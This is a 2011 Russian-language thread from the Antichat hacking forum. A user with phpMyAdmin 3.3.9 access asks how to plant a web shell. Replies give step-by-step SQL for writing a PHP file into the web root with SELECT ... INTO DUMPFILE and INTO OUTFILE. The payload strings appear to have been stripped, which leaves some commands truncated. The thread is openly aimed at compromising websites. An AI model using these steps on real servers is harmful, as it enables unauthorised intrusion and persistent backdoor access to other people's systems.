Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   phpmyadmin Version information: 3.3.9. Залить шелл. (https://forum.antichat.xyz/showthread.php?t=295133)

good.god 23.09.2011 18:19
Всем добрый вечер. Есть доступ в пхп май админ. Хотел бы залить шелл.

Почитал немного как можно это сделать, но ничего не вышло. Надеюсь что не из-за моей кривизны рук, а из-за того, что во всех советах фигурировали версии ниже 3 .

Посоветуйте что-нибудь парни.

FlooP1k 09.10.2011 16:22
Если есть ДБ от сайтов, то попробуй на "дурачку" просто вставляешь в какой то новости или кусочке шаблона, что то типа :

eclipse92 09.10.2011 16:42
Цитата:
Сообщение от good.god
good.god said:
Всем добрый вечер. Есть доступ в пхп май админ. Хотел бы залить шелл.
Почитал немного как можно это сделать, но ничего не вышло. Надеюсь что не из-за моей кривизны рук, а из-за того, что во всех советах фигурировали версии ниже 3
.
Посоветуйте что-нибудь парни.
1. Для эстетики и удобства создаем новую базу:

Код:
Code:
CREATE DATABASE 'backdoor'
2. Ищем установочный путь базы

Код:
Code:
SELECT @@datadir > C:\AppServ\MySQL\data\
3. Выполняем запрос на создание таблицы:

Код:
Code:
CREATE TABLE backdoor( Stack TEXT ) TYPE=MYISaM; INSERT INTO backdoor(Stack) VALUES( '
4. Отдаем команду на дамп содержимого таблицы в файл

Код:
Code:
SELECT * into dumpfile '/C:\AppServ\www\s.php' from backdoor;

chekist 09.10.2011 20:14
eclipse92 нубяра

select '' into outfile '/dirs/shell.php'

eclipse92, а ты в курсе при каком условии это будет работать?

chekist 10.10.2011 20:22
Цитата:
Сообщение от Moriarty
Moriarty said:
При условии, что PMA не фильтрует кавычки?!
юморист


Время: 20:14